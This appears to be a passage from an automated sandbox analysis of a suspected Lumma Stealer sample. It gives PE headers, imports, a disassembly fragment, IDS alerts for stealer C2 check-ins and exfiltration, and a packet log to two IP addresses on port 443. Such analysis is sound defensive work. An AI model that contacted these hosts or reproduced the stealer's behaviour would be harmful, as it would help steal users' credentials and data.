                                                                                            call 00007F69D8F03DDBh
                                                                                            push ebp
                                                                                            call dword ptr [00409134h]
                                                                                            cmp word ptr [004CF0A0h], 0022h
                                                                                            mov dword ptr [0047EAB8h], eax
                                                                                            mov eax, edi
                                                                                            jne 00007F69D8F016DAh
                                                                                            push 00000022h
                                                                                            pop esi
                                                                                            mov eax, 004CF0A2h
                                                                                            push esi
                                                                                            push eax
                                                                                            call 00007F69D8F03AB1h
                                                                                            push eax
                                                                                            call dword ptr [00409260h]
                                                                                            mov esi, eax
                                                                                            mov dword ptr [esp+1Ch], esi
                                                                                            jmp 00007F69D8F01763h
                                                                                            push 00000020h
                                                                                            pop ebx
                                                                                            cmp ax, bx
                                                                                            jne 00007F69D8F016DAh
                                                                                            add esi, 02h
                                                                                            cmp word ptr [esi], bx

                                                                                            Rich Headers

                                                                                            Programming Language:
                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                            • [ C ] VS2010 SP1 build 40219
                                                                                            • [RES] VS2010 SP1 build 40219
                                                                                            • [LNK] VS2010 SP1 build 40219

                                                                                            Data Directories

                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x59692.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x15109c0x2b38.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                            Sections

                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rsrc0x1000000x596920x598004df0f5799b34875861e52427a786d52bFalse0.9810497774092178data7.888274687036025IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0x15a0000xfd60x1000a251a07509abde1b2d87d3c35769346eFalse0.566650390625data5.321067233171646IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                            Resources

                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            RT_ICON0x1002380x57693PNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedEnglishUnited States0.989777535715782
                                                                                            RT_ICON0x1578cc0x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.6680327868852459
                                                                                            RT_ICON0x1589f40x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.8014184397163121
                                                                                            RT_DIALOG0x158e5c0x100dataEnglishUnited States0.5234375
                                                                                            RT_DIALOG0x158f5c0x11cdataEnglishUnited States0.6056338028169014
                                                                                            RT_DIALOG0x1590780x60dataEnglishUnited States0.7291666666666666
                                                                                            RT_GROUP_ICON0x1590d80x30dataEnglishUnited States0.8541666666666666
                                                                                            RT_VERSION0x1591080x2b4dataEnglishUnited States0.48988439306358383
                                                                                            RT_MANIFEST0x1593bc0x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                                            Imports

                                                                                            DLLImport
                                                                                            KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                            USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                            GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                            SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                            ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                            COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                            ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                            VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                            Possible Origin

                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishUnited States

                                                                                            Network Behavior

                                                                                            Suricata IDS Alerts

                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2024-12-27T10:11:42.275845+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739104.21.25.41443TCP
                                                                                            2024-12-27T10:11:43.009436+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449739104.21.25.41443TCP
                                                                                            2024-12-27T10:11:43.009436+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449739104.21.25.41443TCP
                                                                                            2024-12-27T10:11:44.276873+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740104.21.25.41443TCP
                                                                                            2024-12-27T10:11:45.075017+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449740104.21.25.41443TCP
                                                                                            2024-12-27T10:11:45.075017+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449740104.21.25.41443TCP
                                                                                            2024-12-27T10:11:46.617451+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741104.21.25.41443TCP
                                                                                            2024-12-27T10:11:48.917491+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742104.21.25.41443TCP
                                                                                            2024-12-27T10:11:52.958511+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449742104.21.25.41443TCP
                                                                                            2024-12-27T10:11:54.288916+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743104.21.25.41443TCP
                                                                                            2024-12-27T10:11:56.635597+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745104.21.25.41443TCP
                                                                                            2024-12-27T10:11:58.997923+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449747104.21.25.41443TCP
                                                                                            2024-12-27T10:11:59.072441+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.449747104.21.25.41443TCP
                                                                                            2024-12-27T10:12:02.812757+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449758104.21.25.41443TCP
                                                                                            2024-12-27T10:12:03.582821+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449758104.21.25.41443TCP
                                                                                            2024-12-27T10:12:05.154549+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449763104.21.74.235443TCP
                                                                                            2024-12-27T10:12:06.438791+01002008438ET MALWARE Possible Windows executable sent when remote host claims to send a Text File1104.21.74.235443192.168.2.449763TCP

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Dec 27, 2024 10:11:41.040343046 CET49739443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:41.040395021 CET44349739104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:41.040565968 CET49739443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:41.059823036 CET49739443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:41.059844017 CET44349739104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:42.275557041 CET44349739104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:42.275845051 CET49739443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:42.280155897 CET49739443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:42.280168056 CET44349739104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:42.280433893 CET44349739104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:42.326699972 CET49739443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:42.337662935 CET49739443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:42.337680101 CET49739443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:42.337743998 CET44349739104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:43.009409904 CET44349739104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:43.009495020 CET44349739104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:43.009552002 CET49739443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:43.012542963 CET49739443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:43.012562990 CET44349739104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:43.018100977 CET49740443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:43.018136024 CET44349740104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:43.018222094 CET49740443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:43.018526077 CET49740443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:43.018541098 CET44349740104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:44.276787043 CET44349740104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:44.276873112 CET49740443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:44.278256893 CET49740443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:44.278266907 CET44349740104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:44.278495073 CET44349740104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:44.279781103 CET49740443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:44.279830933 CET49740443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:44.279849052 CET44349740104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:45.075016022 CET44349740104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:45.075066090 CET44349740104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:45.075093985 CET44349740104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:45.075144053 CET44349740104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:45.075179100 CET44349740104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:45.075220108 CET49740443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:45.075221062 CET49740443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:45.075238943 CET44349740104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:45.075280905 CET49740443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:45.083051920 CET44349740104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:45.093214035 CET44349740104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:45.093293905 CET44349740104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:45.093379974 CET49740443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:45.093390942 CET44349740104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:45.093442917 CET49740443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:45.194520950 CET44349740104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:45.248553038 CET49740443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:45.248563051 CET44349740104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:45.276402950 CET44349740104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:45.276453972 CET49740443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:45.276460886 CET44349740104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:45.278902054 CET44349740104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:45.278954983 CET49740443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:45.278961897 CET44349740104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:45.278991938 CET44349740104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:45.279035091 CET49740443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:45.279144049 CET49740443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:45.279155016 CET44349740104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:45.279175043 CET49740443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:45.279179096 CET44349740104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:45.358768940 CET49741443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:45.358850002 CET44349741104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:45.358942032 CET49741443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:45.359231949 CET49741443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:45.359265089 CET44349741104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:46.617347002 CET44349741104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:46.617450953 CET49741443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:46.618838072 CET49741443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:46.618854046 CET44349741104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:46.619127989 CET44349741104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:46.620348930 CET49741443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:46.620515108 CET49741443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:46.620548964 CET44349741104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:46.620630980 CET49741443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:46.620639086 CET44349741104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:47.687474966 CET44349741104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:47.687575102 CET44349741104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:47.687654018 CET49741443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:47.687870026 CET49741443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:47.687895060 CET44349741104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:47.705878973 CET49742443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:47.705924988 CET44349742104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:47.706008911 CET49742443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:47.706304073 CET49742443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:47.706322908 CET44349742104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:48.917424917 CET44349742104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:48.917490959 CET49742443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:48.918768883 CET49742443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:48.918777943 CET44349742104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:48.919017076 CET44349742104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:48.920197010 CET49742443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:48.920334101 CET49742443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:48.920367002 CET44349742104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:52.958447933 CET44349742104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:52.958533049 CET44349742104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:52.958687067 CET49742443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:52.958904982 CET49742443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:52.958924055 CET44349742104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:53.029589891 CET49743443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:53.029633045 CET44349743104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:53.029702902 CET49743443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:53.030098915 CET49743443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:53.030112028 CET44349743104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:54.288836002 CET44349743104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:54.288916111 CET49743443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:54.290220976 CET49743443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:54.290229082 CET44349743104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:54.290461063 CET44349743104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:54.291702032 CET49743443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:54.291853905 CET49743443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:54.291884899 CET44349743104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:54.291943073 CET49743443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:54.291953087 CET44349743104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:55.286885977 CET44349743104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:55.286983013 CET44349743104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:55.287045002 CET49743443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:55.287240982 CET49743443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:55.287259102 CET44349743104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:55.377269030 CET49745443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:55.377312899 CET44349745104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:55.377394915 CET49745443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:55.377696037 CET49745443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:55.377708912 CET44349745104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:56.635515928 CET44349745104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:56.635596991 CET49745443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:56.650363922 CET49745443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:56.650382042 CET44349745104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:56.650592089 CET44349745104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:56.651855946 CET49745443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:56.652031898 CET49745443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:56.652038097 CET44349745104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:57.433259964 CET44349745104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:57.433367014 CET44349745104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:57.433424950 CET49745443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:57.433623075 CET49745443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:57.433641911 CET44349745104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:57.738449097 CET49747443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:57.738481998 CET44349747104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:57.738655090 CET49747443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:57.738976955 CET49747443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:57.738987923 CET44349747104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:58.997770071 CET44349747104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:58.997922897 CET49747443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:59.068670988 CET49747443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:59.068686008 CET44349747104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:59.069001913 CET44349747104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:59.070528984 CET49747443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:59.071820021 CET49747443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:59.071851015 CET44349747104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:59.071937084 CET49747443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:59.071966887 CET44349747104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:59.072062969 CET49747443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:59.072107077 CET44349747104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:59.072201014 CET49747443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:59.072225094 CET44349747104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:59.072331905 CET49747443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:59.072359085 CET44349747104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:59.072480917 CET49747443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:59.072551012 CET49747443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:59.072570086 CET44349747104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:59.072583914 CET49747443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:59.072690964 CET49747443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:59.072716951 CET49747443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:59.115338087 CET44349747104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:59.119471073 CET49747443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:59.119513988 CET49747443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:59.119527102 CET49747443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:59.163336992 CET44349747104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:59.167449951 CET49747443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:59.167474985 CET49747443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:59.167494059 CET49747443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:59.215336084 CET44349747104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:59.217497110 CET49747443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:11:59.259335995 CET44349747104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:11:59.436765909 CET44349747104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:12:01.505574942 CET44349747104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:12:01.505673885 CET44349747104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:12:01.505728006 CET49747443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:12:01.505918980 CET49747443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:12:01.505940914 CET44349747104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:12:01.507586002 CET49758443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:12:01.507617950 CET44349758104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:12:01.507699013 CET49758443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:12:01.507977962 CET49758443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:12:01.507988930 CET44349758104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:12:02.812685966 CET44349758104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:12:02.812757015 CET49758443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:12:02.814842939 CET49758443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:12:02.814850092 CET44349758104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:12:02.815084934 CET44349758104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:12:02.816368103 CET49758443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:12:02.816417933 CET49758443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:12:02.816426992 CET44349758104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:12:03.582804918 CET44349758104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:12:03.582892895 CET44349758104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:12:03.582952023 CET49758443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:12:03.583158016 CET49758443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:12:03.583174944 CET44349758104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:12:03.583190918 CET49758443192.168.2.4104.21.25.41
                                                                                            Dec 27, 2024 10:12:03.583195925 CET44349758104.21.25.41192.168.2.4
                                                                                            Dec 27, 2024 10:12:03.890372038 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:03.890407085 CET44349763104.21.74.235192.168.2.4
